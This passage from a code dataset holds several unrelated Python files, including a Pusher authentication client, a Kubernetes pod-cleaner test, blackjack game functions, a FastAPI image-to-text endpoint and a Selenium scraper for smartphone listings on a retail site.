'data/mnist/'\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print('Usage: ')\n exit(1)\n if len(sys.argv) >= 4:\n data_file_name = sys.argv[1]\n label_file_name = sys.argv[2]\n out_file_name = sys.argv[3]\n\n\ndata_path = in_base_path + data_file_name\nlabel_path = in_base_path + label_file_name\nout_path = out_base_path + out_file_name\n\n\ndef prepare_mnist_encoded(data_path, label_path, out_path):\n data = np.loadtxt(data_path)\n label = np.loadtxt(label_path)\n label = np.reshape(label, (label.shape[0], 1))\n encoded_mnist = np.concatenate((data, label), axis=1)\n np.savetxt(out_path, encoded_mnist)\n 
print('done')\n\n\nprepare_mnist_encoded(data_path, label_path, out_path)\n\n","repo_name":"mamiriqbal1/autoencoder","sub_path":"prepare_encoded_mnist_xcs-img.py","file_name":"prepare_encoded_mnist_xcs-img.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17731520913","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import (\n print_function,\n unicode_literals,\n absolute_import,\n division)\n\nimport collections\nimport hashlib\nimport json\nimport os\nimport re\nimport six\nimport time\nimport base64\n\nfrom pusher.util import (\n ensure_text,\n ensure_binary,\n validate_channel,\n validate_socket_id,\n channel_name_re\n )\n\nfrom pusher.client import Client\nfrom pusher.http import GET, POST, Request, request_method\nfrom pusher.signature import sign, verify\nfrom pusher.crypto import *\n\n\nclass AuthenticationClient(Client):\n def __init__(\n self,\n app_id,\n key,\n secret,\n ssl=True,\n host=None,\n port=None,\n timeout=5,\n cluster=None,\n encryption_master_key=None,\n encryption_master_key_base64=None,\n json_encoder=None,\n json_decoder=None,\n backend=None,\n **backend_options):\n\n super(AuthenticationClient, self).__init__(\n app_id,\n key,\n secret,\n ssl,\n host,\n port,\n timeout,\n cluster,\n encryption_master_key,\n encryption_master_key_base64,\n json_encoder,\n json_decoder,\n backend,\n **backend_options)\n\n\n def authenticate(self, channel, socket_id, custom_data=None):\n \"\"\"Used to generate delegated client subscription token.\n\n :param channel: name of the channel to authorize subscription to\n :param socket_id: id of the socket that requires authorization\n :param custom_data: used on presence channels to provide user info\n \"\"\"\n channel = validate_channel(channel)\n\n if not channel_name_re.match(channel):\n raise ValueError('Channel should be a valid channel, got: %s' % channel)\n\n socket_id = validate_socket_id(socket_id)\n\n if custom_data:\n custom_data = json.dumps(custom_data, cls=self._json_encoder)\n\n string_to_sign = \"%s:%s\" % (socket_id, channel)\n\n if custom_data:\n string_to_sign += \":%s\" % custom_data\n\n signature = sign(self.secret, string_to_sign)\n\n auth = \"%s:%s\" % (self.key, signature)\n response_payload = { \"auth\": auth }\n\n if is_encrypted_channel(channel):\n shared_secret = generate_shared_secret(\n ensure_binary(channel, \"channel\"), self._encryption_master_key)\n shared_secret_b64 = base64.b64encode(shared_secret)\n response_payload[\"shared_secret\"] = shared_secret_b64\n\n if custom_data:\n response_payload['channel_data'] = custom_data\n\n return response_payload\n\n\n def validate_webhook(self, key, signature, body):\n \"\"\"Used to validate incoming webhook messages. 
When used it guarantees\n that the sender is Pusher and not someone else impersonating it.\n\n :param key: key used to sign the body\n :param signature: signature that was given with the body\n :param body: content that needs to be verified\n \"\"\"\n key = ensure_text(key, \"key\")\n signature = ensure_text(signature, \"signature\")\n body = ensure_text(body, \"body\")\n\n if key != self.key:\n return None\n\n if not verify(self.secret, body, signature):\n return None\n\n try:\n body_data = json.loads(body, cls=self._json_decoder)\n\n except ValueError:\n return None\n\n time_ms = body_data.get('time_ms')\n if not time_ms:\n return None\n\n if abs(time.time()*1000 - time_ms) > 300000:\n return None\n\n return body_data\n","repo_name":"pusher/pusher-http-python","sub_path":"pusher/authentication_client.py","file_name":"authentication_client.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","stars":370,"dataset":"github-code","pt":"48"} +{"seq_id":"23582499561","text":"#!/usr/bin/env python\n\n\nimport os\nimport subprocess\nimport sys\nimport time\n\nimport kubernetes\n# 3rd party deps\nfrom kubernetes import client, config\nfrom kubernetes.client.rest import ApiException\n\n# constants\nTEST_NAMESPACE = 'test-pod-cleaner'\nTEST_IMAGE = 'nginx'\n\n\ndef create_pod(api, name, namespace, image, cmd):\n pod = client.V1Pod(\n metadata=client.V1ObjectMeta(name=name),\n spec=client.V1PodSpec(\n containers=[\n client.V1Container(\n name=name,\n image=image,\n command=cmd)]))\n\n return api.create_namespaced_pod(namespace=namespace, body=pod)\n\n\ndef create_pods(api, namespace, image):\n create_pod(api, 'test-completed', namespace, image, ['nginx'])\n create_pod(api, 'test-running', namespace,\n image, ['nginx', '-g', 'daemon off;'])\n create_pod(api, 'test-crashloop', namespace, image, ['exit 1'])\n create_pod(api, 'test-can-not-run', namespace, image, ['foo'])\n\n while True:\n pod = api.read_namespaced_pod(name='test-running', namespace=namespace)\n print(\n f\"Waiting for pod {pod.metadata.name} to be running: {pod.status.phase}\")\n if pod.status.phase == 'Running':\n break\n time.sleep(1)\n\n\ndef create_namespace(api, name):\n namespace = client.V1Namespace()\n namespace.metadata = client.V1ObjectMeta(name=name)\n api.create_namespace(body=namespace)\n\n while True:\n namespace = api.read_namespace(name=name)\n print(\n f\"Waiting for namespace {name} to be created, status: {namespace.status.phase}\")\n if namespace.status.phase == 'Active':\n return namespace\n time.sleep(1)\n\n\ndef delete_namespace(api, name):\n return api.delete_namespace(name=name)\n\n\ndef namespace_name(name):\n return f\"{name}-{int(time.time())}\"\n\n\ndef run_cleanup():\n return subprocess.run(\n [sys.executable, 'cleanup.py', '--verbose', '--debug'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n text=True)\n\n\ndef ask_and_exit(exit_code=0):\n if os.getenv('CI') == 'true':\n sys.exit(exit_code)\n\n prompt = input(f\"Clean up namespace {namespace}? 
[y/N] \")\n if prompt.lower() == 'y':\n print(\"Deleting namespace\")\n delete_namespace(api, namespace)\n\n sys.exit(exit_code)\n\n\nif __name__ == '__main__':\n print(\"loading kube config\")\n try:\n config.load_incluster_config()\n except kubernetes.config.config_exception.ConfigException:\n try:\n config.load_kube_config()\n except kubernetes.config.config_exception.ConfigException as e2:\n raise e2\n\n api = client.CoreV1Api()\n namespace = namespace_name(TEST_NAMESPACE)\n\n print(f\"Creating namespace: {namespace}\")\n create_namespace(api, namespace)\n\n print(\"Creating pods\")\n create_pods(api, namespace, TEST_IMAGE)\n\n print(\"Waiting for good luck\")\n time.sleep(30)\n\n print(\"Starting cleanup.py\")\n cleanup = run_cleanup()\n\n print(cleanup.stdout)\n print(cleanup.stderr)\n\n if cleanup.returncode != 0:\n print(\"cleanup.py failed\")\n ask_and_exit(1)\n\n print(\"Waiting 30s for pods to be removed from API-server...\")\n time.sleep(60)\n\n print(\"Checking remaining pods\")\n pods = api.list_namespaced_pod(namespace=namespace).items\n for pod in pods:\n if pod.metadata.name in ('test-can-not-run', 'test-crashloop'):\n print(f\"Pod {pod.metadata.name} was not deleted\")\n print(pod)\n ask_and_exit(1)\n\n ask_and_exit(0)\n","repo_name":"nais/pod-cleaner","sub_path":"cleanup_e2e.py","file_name":"cleanup_e2e.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4517882999","text":"from __future__ import annotations\n\nimport inspect\nimport sys\nfrom functools import wraps\nfrom types import FunctionType\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Sequence\nfrom typing import TypeVar\nfrom unittest import TestCase\n\nif sys.version_info >= (3, 10):\n from typing import ParamSpec\nelse:\n from typing_extensions import ParamSpec\n\n\nclass ParametrizedTestCase(TestCase):\n @classmethod\n def __init_subclass__(cls, **kwargs: Any) -> None:\n super().__init_subclass__(**kwargs)\n\n for name, func in list(cls.__dict__.items()):\n if not isinstance(func, FunctionType):\n continue\n if not hasattr(func, \"_parametrized\"):\n continue\n\n if hasattr(func, \"__wrapped__\") and hasattr(\n func.__wrapped__, \"_parametrized\"\n ):\n raise TypeError(\n \"@parametrize must be the top-most decorator on \"\n + func.__qualname__\n )\n\n _parametrized = func._parametrized # type: ignore [attr-defined]\n delattr(cls, name)\n for param in _parametrized.params:\n params = dict(zip(_parametrized.argnames, param.args))\n\n @wraps(func)\n def test(\n self: TestCase,\n *args: Any,\n _func: FunctionType = func,\n _params: dict[str, Any] = params,\n **kwargs: Any,\n ) -> Any:\n return _func(self, *args, **_params, **kwargs)\n\n test.__name__ = f\"{name}_{param.id}\"\n test.__qualname__ = f\"{test.__qualname__}_{param.id}\"\n\n if hasattr(cls, test.__name__):\n raise ValueError(\n f\"Duplicate test name {test.__name__} in {cls.__name__}\"\n )\n\n setattr(cls, test.__name__, test)\n\n\nclass param:\n __slots__ = (\"args\", \"id\")\n\n def __init__(self, *args: Any, id: str | None = None) -> None:\n self.args = args\n\n if id is not None and not f\"_{id}\".isidentifier():\n raise ValueError(f\"id must be a valid Python identifier suffix: {id!r}\")\n\n self.id = id\n\n\nclass parametrized:\n __slots__ = (\"argnames\", \"params\")\n\n def __init__(self, argnames: Sequence[str], params: Sequence[param]) -> None:\n self.argnames = argnames\n self.params = params\n\n\nP = 
ParamSpec(\"P\")\nT = TypeVar(\"T\")\nTestFunc = Callable[P, T]\n\n\ndef parametrize(\n argnames: str | Sequence[str],\n argvalues: Sequence[tuple[Any, ...]] | Sequence[param],\n ids: Sequence[str | None] | None = None,\n) -> Callable[[Callable[P, T]], Callable[P, T]]:\n if isinstance(argnames, str):\n argnames = argnames.split(\",\")\n\n if len(argnames) == 0:\n raise ValueError(\"argnames must contain at least one element\")\n\n if ids is not None and len(ids) != len(argvalues):\n raise ValueError(\"ids must have the same length as argvalues\")\n\n seen_ids = set()\n params = []\n for i, argvalue in enumerate(argvalues):\n if ids and ids[i]:\n id_ = ids[i]\n else:\n id_ = str(i)\n\n if isinstance(argvalue, tuple):\n if len(argvalue) != len(argnames):\n raise ValueError(\n f\"tuple at index {i} has wrong number of arguments \"\n + f\"({len(argvalue)} != {len(argnames)})\"\n )\n params.append(param(*argvalue, id=id_))\n elif isinstance(argvalue, param):\n if len(argvalue.args) != len(argnames):\n raise ValueError(\n f\"param at index {i} has wrong number of arguments \"\n + f\"({len(argvalue.args)} != {len(argnames)})\"\n )\n\n if argvalue.id is None:\n argvalue = param(*argvalue.args, id=id_)\n if argvalue.id in seen_ids:\n raise ValueError(f\"Duplicate param id {argvalue.id!r}\")\n seen_ids.add(argvalue.id)\n params.append(argvalue)\n\n else:\n raise TypeError(\n f\"argvalue at index {i} is not a tuple or param instance: {argvalue!r}\"\n )\n\n _parametrized = parametrized(argnames, params)\n bind_kwargs = {k: None for k in _parametrized.argnames}\n\n def wrapper(func: Callable[P, T]) -> Callable[P, T]:\n # Check given argnames will work\n sig = inspect.signature(func)\n sig.bind_partial(**bind_kwargs)\n\n if hasattr(func, \"_parametrized\"):\n raise TypeError(f\"@parametrize cannot be stacked on {func.__qualname__}\")\n\n func._parametrized = _parametrized # type: ignore [attr-defined]\n return func\n\n return wrapper\n","repo_name":"adamchainz/unittest-parametrize","sub_path":"src/unittest_parametrize/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"48"} +{"seq_id":"38842931353","text":"import logging\nimport os\nfrom logging.handlers import TimedRotatingFileHandler\n\nFORMATTER = logging.Formatter(\"%(asctime)s — %(name)s — %(levelname)s — %(message)s\")\nLOG_FILE = os.path.abspath(\"\") + \"\\\\logs\\\\log.log\"\n\n\ndef get_file_handler():\n file_handler = TimedRotatingFileHandler(LOG_FILE)\n file_handler.setFormatter(FORMATTER)\n return file_handler\n\n\ndef get_logger(logger_name):\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.INFO)\n logger.addHandler(get_file_handler())\n logger.info(\"Logger is set up\")\n return logger\n\n\nLOGGER = get_logger(\"test\")\n","repo_name":"alex142/python_selenium_start","sub_path":"helpers/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11413098270","text":"from api.OrderHandlerTester import OrderHandler\n\n\ndef add_order(requester_id, bu, order_type, description):\n order = OrderHandler()\n orderno = order.add_order(requester_id, bu, order_type, description)\n return 'Order ' + orderno + ' has been added'\n\n\ndef get_order_status(id) -> str:\n order = OrderHandler()\n status = order.get_order_status(id)\n if len(status) > 0:\n return 'Order {id} has the status: 
{status}'.format(id=id, status=status) # noqa\n else:\n return 'The specified order id is invalid'\n\n\ndef get_order_details(id) -> str:\n order = OrderHandler()\n info = order.get_order_details(id)\n if len(info) > 0:\n return 'Order {id} infos: {info}'.format(id=id, info=info)\n else:\n return 'The specified order id is invalid'\n","repo_name":"baloise/oim-api","sub_path":"apiserver/api/calls_order.py","file_name":"calls_order.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29051143130","text":"#!/usr/bin/python3\ndef list_division(my_list_1, my_list_2, list_length):\n new_list = []\n i = 0\n try:\n while i < list_length:\n try:\n elem = my_list_1[i] / my_list_2[i]\n new_list.append(elem)\n i += 1\n except ZeroDivisionError:\n print(\"division by 0\")\n new_list.append(0)\n i += 1\n except (ValueError, TypeError):\n print(\"wrong type\")\n new_list.append(0)\n i += 1\n except IndexError:\n print(\"out of range\")\n new_list.append(0)\n break\n finally:\n return new_list\n","repo_name":"geraldrolland/alx-higher_level_programming","sub_path":"0x05-python-exceptions/4-list_division.py","file_name":"4-list_division.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72000814227","text":"import random\r\nimport os\r\nimport sys\r\n\r\n\r\ncards = {\"A\": 11, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, 10: 10, \"J\": 10, \"Q\": 10, \"K\": 10}\r\n\r\n\r\ndef house_rules():\r\n read_rules = input(\"Would you like to read the House Rules? Type 'y' or 'n': \").lower()\r\n while read_rules not in ['y', 'n']:\r\n read_rules = input(\"Please type either 'y' or 'n': \").lower()\r\n if read_rules == 'y':\r\n rules = \"\\n*** Blackjack House Rules ***\\n\\nThe deck is unlimited in size\\nJacks, Queens, and Kings all count \"\\\r\n \"as 10 points\\nAces can count as 11 or 1 depending on your hand value\\nThe rest of the cards are \" \\\r\n \"worth their face value.\\nThere are no Jokers\\nAll cards have an equal probability of being drawn\\n\" \\\r\n \"Cards are not removed from the deck as they are drawn\\nThe computer is the dealer\\nIf either the \" \\\r\n \"player or the dealer exceed 21 points, it is an automatic loss\\nTry to get as close as you can to \" \\\r\n \"21 points without going over in order to win\"\r\n return rules\r\n else:\r\n return \"\"\r\n\r\n\r\ndef deal_card(hand, score):\r\n \"\"\"\r\n Function chooses a random card, value pair from `cards` dictionary and adds it to the specified hand.\r\n :param hand: the list to append the card to\r\n :param score: the score that the card value gets added to\r\n :return: returns revised hand and score of that hand\r\n \"\"\"\r\n card, value = random.choice(list(cards.items()))\r\n hand.append(card)\r\n score += value\r\n return hand, score\r\n\r\n\r\ndef is_blackjack(p_score, d_score):\r\n \"\"\"\r\n Function checks to see if blackjack (21) points has been achieved. 
Dealer has precedence in blackjack.\r\n If both dealer and player have blackjack, dealer still wins.\r\n :param p_score: player score\r\n :param d_score: dealer score\r\n :return: Message if blackjack has been achieved (distinct messages for player and dealer,\r\n and an empty string if blackjack has not been achieved\r\n \"\"\"\r\n if d_score == 21:\r\n check = \"d-blackjack\"\r\n elif p_score == 21:\r\n check = \"p-blackjack\"\r\n else:\r\n check = \"\"\r\n return check\r\n\r\n\r\ndef convert_ace(hand, score, ace_counter):\r\n \"\"\"\r\n Function checks to see if a hand is over 21 and has an \"A\" card. If both conditions are true, the\r\n value of the \"A\" card is decreased from 11 to 1.\r\n :param hand: the hand to check for \"A\"\r\n :param score: the score to check if over 21\r\n :param ace_counter: checks to see if aces have already been converted before adjusting score\r\n :return: adjusted score, adjusted ace_counter\r\n \"\"\"\r\n if \"A\" in hand and score > 21 and hand.count(\"A\") > ace_counter:\r\n score -= 10\r\n ace_counter += 1\r\n return score, ace_counter\r\n\r\n\r\ndef instant_loss(hand_owner, hand, score):\r\n \"\"\"\r\n Function evaluates is a particular hand has exceeded 21, thus causing an instant loss\r\n :param hand_owner: the owner of the hand (either dealer or player)\r\n :param hand: cards\r\n :param score: card scores\r\n :return: the message generated by the if statement\r\n \"\"\"\r\n if score > 21 and hand_owner == \"player\":\r\n message = f\"\\nYour hand is {hand}, current score is {score}\\nYou've exceeded 21 points\\n\\nYOU LOSE!\"\r\n elif score > 21 and hand_owner == \"dealer\":\r\n message = f\"\\nComputer's hand is {hand}, current score is {score}\\nComputer has exceeded 21 points\\n\\nYOU WIN!\"\r\n else:\r\n message = \"continue\"\r\n return message\r\n\r\n\r\ndef calculate_winner(player_hand, player_score, dealer_hand, dealer_score):\r\n \"\"\"\r\n Function weighs player score vs. dealer scores and determines whether player has won, lost,\r\n or if game is a draw\r\n :param player_hand: player hand\r\n :param player_score: player score value\r\n :param dealer_hand: dealer hand\r\n :param dealer_score: dealer score value\r\n :return: message corresponding to player win, player loss,or tie\r\n \"\"\"\r\n if player_score == dealer_score:\r\n message = f\"Your hand {player_hand}, current score: {player_score}\\nComputer's hand {dealer_hand}, current score: {dealer_score}\\nIt's a tie!\\n\\nGAME ENDS IN A DRAW!\"\r\n elif dealer_score > player_score:\r\n message = f\"Your hand {player_hand}, current score: {player_score}\\nComputer's hand {dealer_hand}, current score: {dealer_score}\\nComputer wins with {dealer_score}!\\n\\nYOU LOSE!\"\r\n else:\r\n message = f\"Your hand {player_hand}, current score: {player_score}\\nComputer's hand {dealer_hand}, current score: {dealer_score}\\nYou win with a score of {player_score}!\\n\\nYOU'RE THE WINNER!\"\r\n return message\r\n\r\n\r\ndef clear():\r\n \"\"\"\r\n Clears console\r\n \"\"\"\r\n os.system('cls')\r\n\r\n\r\ndef yes_or_no():\r\n \"\"\"\r\n Asks player if they would like another card; will not accept values other than 'y' or 'n'\r\n :return: returns player answer (either 'y' or 'n')\r\n \"\"\"\r\n answer = input(\"Would you like another card? 
Type 'y' or 'n': \").lower()\r\n while answer != 'y' and answer != 'n':\r\n answer = input(\"Please enter either 'y' or 'n': \").lower()\r\n return answer\r\n\r\n\r\ndef replay():\r\n \"\"\"\r\n Asks player if they would like to play again; only accepts valid answers\r\n :return: closes program if player does not want to play again\r\n \"\"\"\r\n another_round = input(\"\\nWould you like to play again? Type 'y' or 'n': \").lower()\r\n while another_round != 'y' and another_round != 'n':\r\n another_round = input(\"Please pick either 'y' or 'n': \").lower()\r\n\r\n if another_round == 'n':\r\n return sys.exit(\"Thank you for playing!\")\r\n else:\r\n return\r\n","repo_name":"MaryanneR/Simple-Python-Games","sub_path":"blackjack_game/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18500500454","text":"import json\nfrom flask import Flask, request, jsonify\nimport pandas as pd\nimport pickle\nimport numpy as np\n__locations = None\n__data_columns = None\n__model = None\n\n\ndef get_estimated_price(bedrooms, parking_space, house_type):\n try:\n # Convert house_type to lowercase\n house_type = house_type\n\n # Create a DataFrame with the input data\n df = pd.DataFrame({\n \"bedrooms\": [bedrooms],\n \"parking_space\": [parking_space],\n \"house_type\": [house_type]\n })\n\n # Perform one-hot encoding on the 'house_type' column\n df_encoded = pd.get_dummies(df)\n\n try:\n # Load the trained model\n with open('artifacts/lekki_home_prices_model.pickle', 'rb') as file:\n model = pickle.load(file)\n\n # Load the X_train dataframe\n with open('artifacts/x_train.pickle', 'rb') as file:\n X_train = pickle.load(file)\n\n # Get the column names from the training data used for the model\n model_columns = X_train.columns.to_list()\n\n # Ensure the encoded dataframe has the same columns as the training data\n df_encoded = df_encoded.reindex(columns=model_columns, fill_value=0)\n\n # Make the prediction using the loaded model\n prediction = model.predict(df_encoded).round(2)[0]\n\n formatted_prediction = \"₦{:,}\".format(prediction)\n # Prepare the response\n response = {\n \"prediction\": formatted_prediction\n }\n\n return (response)\n\n except FileNotFoundError:\n error_response = {\n \"error\": \"Model or X_train pickle file not found\"\n }\n return jsonify(error_response), 500\n\n except KeyError:\n error_response = {\n \"error\": \"Invalid input format\"\n }\n return jsonify(error_response), 400\n\ndef get_location_names():\n return __locations\n\n\ndef load_saved_artifects():\n print(\"loading saved artifacts .. 
start\")\n global __data_columns\n global __locations\n\n with open(\"./artifacts/columnsX_train.json\",'r') as f:\n __data_columns = json.load(f)['data_columns']\n __locations = __data_columns[2:]\n\n global __model\n\n with open(\"./artifacts/lekki_home_prices_model.pickle\",\"rb\") as f:\n __model = pickle.load(f)\n\n print(\"loading saved artifects..done\")\nif __name__ == '__main__':\n load_saved_artifects()\n print(get_location_names())\n print(get_estimated_price(4, 3, \"Block of Flats\"))\n print(get_estimated_price(4, 3, \"Detached Duplex\"))\n print(get_estimated_price(4, 3, \"Semi Detached Duplex\"))\n print(get_estimated_price(4, 1, \"Block of Flats\"))\n\n","repo_name":"saaga23/Lekki-house-price-pridiction","sub_path":"server/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71204525586","text":"import logging\nfrom http import HTTPStatus\nfrom io import BytesIO\n\nimport PIL\nfrom PIL import Image\nfrom fastapi import APIRouter, File, UploadFile, HTTPException, Form\nfrom starlette.responses import PlainTextResponse, Response\n\nfrom text_to_image import TextImage, ImageFormat\n\nimage_to_text_router = APIRouter()\nlogger = logging.getLogger(__name__)\n\n\ndef get_image_format(file: UploadFile, user_provided_extension: str | None) -> ImageFormat:\n if user_provided_extension:\n extension = user_provided_extension\n else:\n extension = file.content_type.split('/')[-1]\n\n try:\n return ImageFormat.parse(extension)\n except ValueError as value_error:\n logger.warning('Could not get ImageFormat from provided extension', exc_info=value_error)\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail='Requested image extension is not supported'\n )\n\n\ndef get_text_image(content: bytes, image_format: ImageFormat) -> TextImage:\n with BytesIO(content) as io:\n try:\n image = Image.open(io, mode='r', formats=(image_format,))\n except PIL.UnidentifiedImageError as unidentified_error:\n logger.warning('Error during file decode', exc_info=unidentified_error)\n raise HTTPException(\n status_code=HTTPStatus.UNPROCESSABLE_ENTITY,\n detail='Could not open image in specified format'\n )\n\n encoded_text = bytes(\n byte\n for pixel in image.getdata()\n for byte in pixel\n ).rstrip(b'\\0')\n\n return TextImage(encoded_text)\n\n\n@image_to_text_router.post(\"/api/image/to/text\", response_class=PlainTextResponse)\nasync def post__image_to_text(\n file: UploadFile = File(),\n image_extension: str = Form(default=None,\n alias='imageFormat')) -> Response:\n image_format = get_image_format(file, image_extension)\n file_bytes = await read_upload_file(file)\n text_image = get_text_image(file_bytes, image_format)\n text = decode_text(text_image)\n return PlainTextResponse(\n text,\n status_code=HTTPStatus.OK,\n media_type=\"text/plain\"\n )\n\n\ndef decode_text(image: TextImage) -> str:\n try:\n text = image.text\n except (ValueError, UnicodeDecodeError) as error:\n logger.warning('Error during converting image',\n exc_info=error)\n raise HTTPException(\n status_code=HTTPStatus.UNPROCESSABLE_ENTITY,\n detail=\"Could not convert given image to text\",\n )\n return text\n\n\nasync def read_upload_file(file: UploadFile) -> bytes:\n file_bytes = await file.read()\n if not len(file_bytes):\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail='Provided image file is empty'\n )\n return 
file_bytes\n","repo_name":"ashenBlade/text-2-image","sub_path":"src/backend/web/routers/image_to_text.py","file_name":"image_to_text.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"31543433511","text":"from sklearn.externals import joblib\nimport sys\nimport numpy as np\nimport os,sys,inspect\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\nsys.path.insert(0,parentdir)\nimport models.baseline as bs\nimport models.baseline.utils.score as sc\nimport models.baseline.feature_engineering as fe\n\n\nPATH = 'features/'\nif not os.path.exists(PATH):\n os.makedirs(PATH)\n\ndef load_classifier(path):\n clf = joblib.load(path)\n return clf\n\ndef load_text(path):\n text = np.loadtxt(path)\n print(text)\n\ndef make_prediction(stance, body, clf):\n \"\"\" stance - str 'headline'\n body - str 'article'\n \"\"\"\n h = [stance]\n b = [body]\n X = fit_features(h,b)\n\n print(clf.predict_proba(X))\n predicted = sc.LABELS[int(clf.predict(X))]\n\n print(predicted)\n\ndef fit_features(h, b, name='test'):\n\n X_overlap = fe.gen_or_load_feats(fe.word_overlap_features, h, b, PATH + \"overlap.\"+name+\".npy\")\n X_refuting = fe.gen_or_load_feats(fe.refuting_features, h, b, PATH + \"refuting.\"+name+\".npy\")\n X_polarity = fe.gen_or_load_feats(fe.polarity_features, h, b, PATH + \"polarity.\"+name+\".npy\")\n X_hand = fe.gen_or_load_feats(fe.hand_features, h, b, PATH + \"hand.\"+name+\".npy\")\n\n X = np.c_[X_hand, X_polarity, X_refuting, X_overlap]\n return X\n\nif __name__=='__main__':\n clf = load_classifier(sys.argv[1])\n #load_text(sys.argv[1])\n\n with open('article1.txt') as f:\n text = f.read()\n stance = \"Woman detained in Lebanon is not al-Baghdadi's wife, Iraq says\"\n make_prediction(stance,text, clf)\n","repo_name":"hanveiga/checkyouout","sub_path":"tests/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41760088402","text":"import time\nimport re\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import *\nfrom bs4 import BeautifulSoup\nimport selenium.common.exceptions\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom bs4 import BeautifulSoup\nurls_phone=[]\nwait_long=5\nwait_mean=3\nurl_main=\"https://www.dns-shop.ru\"\nurl_group=\"https://www.dns-shop.ru/catalog/17a8a01d16404e77/smartfony/\"\ndef init_driver():\n ff = \"../../install/chromedriver\"\n chrome_option = webdriver.ChromeOptions()\n prefs = {\"profile.managed_default_content_settings.images\": 2}\n chrome_option.add_experimental_option(\"prefs\", prefs)\n\n driver = webdriver.Chrome(executable_path=ff,chrome_options=chrome_option)\n #driver = webdriver.Chrome(executable_path=ff)\n driver.wait = WebDriverWait(driver,0)\n return driver\n\ndef parsing():\n print(\"Парсинг страницы\")\n # url = driver.get(url_group)\n # url = driver.get(\"https://www.dns-shop.ru/catalog/17a8a01d16404e77/smartfony/?p=10&i=1\")\n\n catalog_items_list = driver.find_element_by_class_name(\"catalog-items-list\")\n items = 
catalog_items_list.find_elements_by_class_name(\"item\")\n for item in items:\n webdriver.ActionChains(driver).move_to_element(item).perform();\n try:\n accessibility = item.find_element_by_class_name(\"pseudo-link\")\n except NoSuchElementException:\n accessibility=None\n if(accessibility!=None):\n if (accessibility.text.find(\"магаз\") != -1):\n print(\"Парсинг данных\")\n title = item.find_element_by_tag_name(\"h3\").text\n index_smatrphone = title.find(\"Смартфон\")\n # 9 - это длина слова 'Смартфон ' + пробел\n index_GB = title.find(\"ГБ\")\n text = title[index_smatrphone + 9:]\n opa = title[index_smatrphone + 9:index_GB - 1]\n index_space = opa.rfind(\" \")\n name = text[:index_space]\n print(\"Название телефона:\", name)\n color = title[index_GB + 3:]\n print(\"Цвет:\", color)\n variant = title[len(name) + index_smatrphone + 10:index_GB + 2]\n print(\"Разновидность:\", variant)\n\n\n price = item.find_element_by_xpath(\"*//span[@data-of='price-total' and @data-product-param='price']\").get_attribute(\"data-value\")\n print(\"цена\", price)\n\n div_title = item.find_element_by_class_name(\"title\")\n link = div_title.find_element_by_tag_name(\"a\").get_attribute(\"href\")\n print(\"Ссылка\", link)\n try:\n previous_price_s = item.find_element_by_class_name('prev-price-total')\n except (NoSuchElementException):\n previous_price_s = None\n if (previous_price_s != None):\n previous_price_s = previous_price_s.text\n previous_price = previous_price_s.replace(\" \", \"\")\n print(\"Предыдущая цена:\", previous_price)\n discount = item.find_element_by_xpath(\"*//span[@class='percent']\").text[-2:-1]\n print(\"Скидка:\", discount)\n id_accessibility=accessibility.get_attribute('data-product-id')\n print(id_accessibility)\n accessibility.click()\n shop_flters_id=\"shop-filters-list-\"+id_accessibility\n window_div_text=\"avails-modal-\"+id_accessibility\n print(shop_flters_id)\n div_shop_filters_list=WebDriverWait(driver, 30).until(EC.visibility_of_element_located((By.ID, shop_flters_id)))\n window = WebDriverWait(driver, 15).until(EC.visibility_of_element_located((By.ID, window_div_text)))\n div_avails_list_shown=window.find_element_by_class_name(\"avails-list\")\n shops = div_avails_list_shown.find_elements_by_xpath(\"*//div[(@class='avails-item row' or @class='avails-item row ') and @data-is-avail='1']\")\n\n print(\" ---------------Количество----\",len(shops))\n if(len(shops)==0):\n time.sleep(1000)\n for shop in shops:\n shop_latitude = shop.get_attribute('data-latitude')\n shop_longitude = shop.get_attribute('data-longitude')\n shop_name_text = shop.find_element_by_class_name('shop-name')\n shop_name = shop_name_text.find_element_by_tag_name('a').text\n shop_address = shop_name_text.find_elements_by_tag_name('p')[1].text\n count_phone_text = 